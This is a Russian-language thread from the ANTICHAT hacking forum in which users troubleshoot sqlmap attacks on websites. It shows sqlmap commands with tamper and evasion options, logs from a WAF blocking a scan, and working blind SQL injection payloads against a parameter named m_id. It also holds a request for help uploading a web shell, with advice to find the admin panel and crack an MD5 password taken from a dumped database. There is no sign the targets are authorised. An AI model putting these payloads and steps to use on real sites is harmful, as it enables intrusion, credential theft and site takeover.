ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.09.2016, 12:13
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме:
14367
Репутация:
0
|
|
[11:03:22] [INFO] fetching tables for database: 'information_schema'
[11:03:22] [INFO] fetching number of tables for database 'information_schema'
[11:03:22] [INFO] retrieved:
[11:03:22] [WARNING] unable to retrieve the number of tables for database 'information_schema'
[11:03:22] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
[11:03:24] [INFO] checking table existence using items from 'C:\sql\txt\common-tables.txt'
[11:03:24] [INFO] adding words used on web page to the check list
[11:03:24] [INFO] starting 10 threads
[11:06:07] [WARNING] no table(s) found
No tables found
[11:06:07] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2948 times
Питаюсь достать инфу и в итоге ничего. спасибо жду вашей help
|
|
|
16.09.2016, 12:28
|
|
Познающий
Регистрация: 29.03.2012
Сообщений: 77
Провел на форуме:
14367
Репутация:
0
|
|
|
|
|
|
16.09.2016, 12:30
|
|
Новичок
Регистрация: 16.09.2016
Сообщений: 1
Провел на форуме:
312
Репутация:
0
|
|
Приветствую, нужна ваша помощь!
Команды:
1. Sqlmap.py -r "txt" --dbs
Пытаясь найти базу выдает вот это:
Код:
[16:30:03] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. As heuristic test turn
ed out positive you are strongly advised to continue on with the tests. Please,
consider usage of tampering scripts as your target might filter the queries. Als
o, you can try to rerun by providing a valid value for option '--string' as perh
aps the string you have chosen does not match exclusively True responses. If you
suspect that there is some kind of protection mechanism involved (e.g. WAF) may
be you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
2. Sqlmap.py -r "txt" -v 3 --tamper="space2comment" --random-agent --no-cast --time-sec=10
после нее вот это:
Код:
[16:12:56] [CRITICAL] all tested parameters appear to be not injectable. Try to
increase '--level'/'--risk' values to perform more tests. As heuristic test turn
ed out positive you are strongly advised to continue on with the tests. Please,
consider usage of tampering scripts as your target might filter the queries. Als
o, you can try to rerun by providing either a valid value for option '--string'
(or '--regexp')
3. Sqlmap.py -r "txt" --stringer --regexp
После нее возникает снова крит "--tramp space2comment".
и так по кругу... В чем ошибка и как это все сделать правильно, заранее спасибо! |
|
|
|
17.09.2016, 10:03
|
|
Новичок
Регистрация: 17.09.2016
Сообщений: 6
Провел на форуме:
1489
Репутация:
0
|
|
Привет!
Ув. форумчане, помогите пожалуйста!
Можно ли каким-то образом залить шелл?
 |
|
|
|
17.09.2016, 11:01
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от masterdolicjakov
↑
Привет!
Ув. форумчане, помогите пожалуйста!
Можно ли каким-то образом залить шелл?
--is-dba
|
|
|
|
17.09.2016, 11:32
|
|
Новичок
Регистрация: 17.09.2016
Сообщений: 6
Провел на форуме:
1489
Репутация:
0
|
|
Привет!
Нет, к сожалению не под админом.
current user is DBA: False
|
|
|
|
17.09.2016, 12:25
|
|
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
Провел на форуме:
65956
Репутация:
0
|
|
Сообщение от masterdolicjakov
↑
Привет!
Нет, к сожалению не под админом.
current user is DBA: False
ищи админку значит,пробуй через нее залиться
|
|
|
|
17.09.2016, 12:28
|
|
Новичок
Регистрация: 17.09.2016
Сообщений: 6
Провел на форуме:
1489
Репутация:
0
|
|
Сообщение от .Light.
↑
ищи админку значит,пробуй через нее залиться
Админку нашел.
site.com/admin
Есть логин из базы и пасс в md5
В теме попросил расшифровать пасс.
А так больше нету вариантов?
Да, и спасибо что отвечаете!
|
|
|
|
19.09.2016, 20:27
|
|
Познающий
Регистрация: 31.07.2015
Сообщений: 41
Провел на форуме:
9212
Репутация:
1
|
|
Как выбрать нужный playload.?
Parameter: m_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH
Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й
|
|
|
|
19.09.2016, 20:56
|
|
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820
Репутация:
90
|
|
Сообщение от powerOfthemind
↑
Как выбрать нужный playload.?
Parameter: m_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH
Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й
Код:
~/sqlmapproject-sqlmap$ python sqlmap.py --help | grep tech
techniques
--technique=TECH SQL injection techniques to use (default "BEUSTQ")
--technique=B
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
